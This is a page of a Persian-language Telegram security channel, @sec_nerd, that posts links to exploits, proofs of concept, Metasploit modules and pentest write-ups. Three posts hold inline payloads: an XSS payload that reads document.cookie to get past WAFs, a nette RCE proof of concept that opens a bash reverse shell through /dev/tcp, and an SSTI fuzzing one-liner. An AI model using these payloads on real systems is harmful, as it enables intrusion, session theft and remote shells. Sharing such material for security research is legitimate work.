امنیت اطلاعات
@sec_nerd
851 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
About
Blog
Apps
Platform
Join
امنیت اطلاعات
851 subscribers
امنیت اطلاعات
https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html


#windows
#privesc
#pentest


@sec_nerd
612 views
امنیت اطلاعات
مجموعه اکسپلویت های ManageEngine

https://github.com/patois/zohocorp_dc


#zoho
#poc
#java

@sec_nerd
643 views
امنیت اطلاعات
From S3 bucket to Laravel unserialize RCE

https://blog.truesec.com/2020/02/12/from-s3-bucket-to-laravel-unserialize-rce/


#aws
#laravel
#poi
#rce

@sec_nerd
1.12K views
امنیت اطلاعات
گامهای اولیه در کشف باگ از سورس کد

https://btlr.dev/blog/how-to-find-vulnerabilities-in-code-bad-words


#whitebox
#pentest


@sec_nerd
1.43K views
امنیت اطلاعات
دور زدن WAF و بلک لیست با پیلود جدید XSS

Payload: alert?.(document?.cookie)


#xss
#bugbounty


@sec_nerd
1.31K views
امنیت اطلاعات
github


#lol
#fun


@sec_nerd
925 views
امنیت اطلاعات
آسیب پذیریِ خواندن فایل دلخواه در Vmware vCenter نسخه های پیش از 6.5u1

#vmware
#network


@sec_nerd
808 viewsedited  
امنیت اطلاعات
ماژول متاسپلویت برای آسیب پذیری ssi در sharepoint

CVE-2020-16952

https://github.com/wvu-r7/metasploit-framework/blob/feature/sharepoint/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb


جزییات بیشتر:
https://github.com/rapid7/metasploit-framework/pull/14265

#windows
#sharepoint
#ssi


@sec_nerd
709 views
امنیت اطلاعات
امنیت اطلاعات
چند اسکریپت اثبات آسیب پذیری کشف شده در yii https://github.com/Maskhe/CVE-2020-15148-bypasses #poi #rce #php @sec_nerd
شرق آسیایی ها بعد از اپلیکیشن های مبتنی بر جاوا حالا سراغ فریمورک های php رفتن و اینبار از فریمورک nette آسیب پذیری RCE کشف کردن

CVE-2020-15227 PHP framework nette callback RCE

POC: /nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1


#php
#nette
#rce


@sec_nerd
995 views
امنیت اطلاعات
باگ RCE در Pulse Secure پس از احراز هویت

https://www.gosecure.net/blog/2020/08/26/forget-your-perimeter-rce-in-pulse-connect-secure/

CVE-2020-8218

#rce
#pulse
#network


@sec_nerd
1K views
امنیت اطلاعات
#fun

خیلی هامون اینو تجربه کردیم!

@sec_nerd
688 views
امنیت اطلاعات
توضیحات و اکسپلویت آسیب پذیری اخیر outlook 2019

https://github.com/0neb1n/CVE-2020-16947


#outlook
#windows
#rce


@sec_nerd
GitHub
GitHub - 0neb1n/CVE-2020-16947: PoC of CVE-2020-16947 (Microsoft Outlook RCE vulnerablility)
PoC of CVE-2020-16947 (Microsoft Outlook RCE vulnerablility) - 0neb1n/CVE-2020-16947
751 views
امنیت اطلاعات
توضیحات کامل یک محقق در خصوص آسیب پذیری استک tcp/ip در ویندوز که با نام bad neighbor (همسایه ی بد) شناخته میشود


cve-2020-16898

https://blog.pi3.com.pl/?p=780


کد اکسپلویت:
https://site.pi3.com.pl/exp/p_CVE-2020-16898.py


#windows
#tcpip
#rce


@sec_nerd
741 views
امنیت اطلاعات
راهکارهایی برای دور زدن پیامهای 403 و 401

#bugbounty
#pentest


@sec_nerd
1.18K views
امنیت اطلاعات
https://twitter.com/MrDamanSingh/status/1317042176337932291?s=20
https://twitter.com/nullenc0de/status/1317195661377503232?s=20

#ssti
#pentest


@sec_nerd
Twitter
Damanpreet Singh🇮🇳
Got RCE in 2 minutes via SSTI, ~waybackurls https://t.co/DC4dDq3TjO | qsreplace "daman{{9*9}}" > fuzz.txt ~ffuf -u FUZZ -w fuzz.txt -replay-proxy https://127.0.0.1:8080/ (captured requests in burp) searched: daman81 in burp, got 43 results from 1266 requests…
1.14K views
امنیت اطلاعات
اساسیات PE injection

https://blog.sevagas.com/IMG/pdf/code_injection_series_part1.pdf


#PE
#windows
#pentest

@sec_nerd
729 views
امنیت اطلاعات
باگ RCE در اپلیکیشن discord

masatokinugawa.l0.cm/2020/10/discord-desktop-rce.html (日本語)
https://mksben.l0.cm/2020/10/discord-desktop-rce.html (English)
https://youtube.com/watch?v=0f3RrvC-zGI (DEMO)


#discord
#rce

@sec_nerd
mksben.l0.cm
Discord Desktop app RCE
A few months ago, I discovered a remote code execution issue in the Discord desktop application and I reported it via their Bug Bounty Prog...
1.09K views
امنیت اطلاعات
hacking android apps with frida

https://www.youtube.com/watch?v=iMNs8YAy6pk


#frida
#android
#pentest


@sec_nerd
YouTube
Hacking Android Apps with Frida
Recording from Meta's security conference 2020 - Enjoy
1.13K views
امنیت اطلاعات
ورد لیست برای بروت فورس xxe

https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf


#xxe
#pentest

@sec_nerd
Gist
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder - xxe-payloads.txt
1.26K views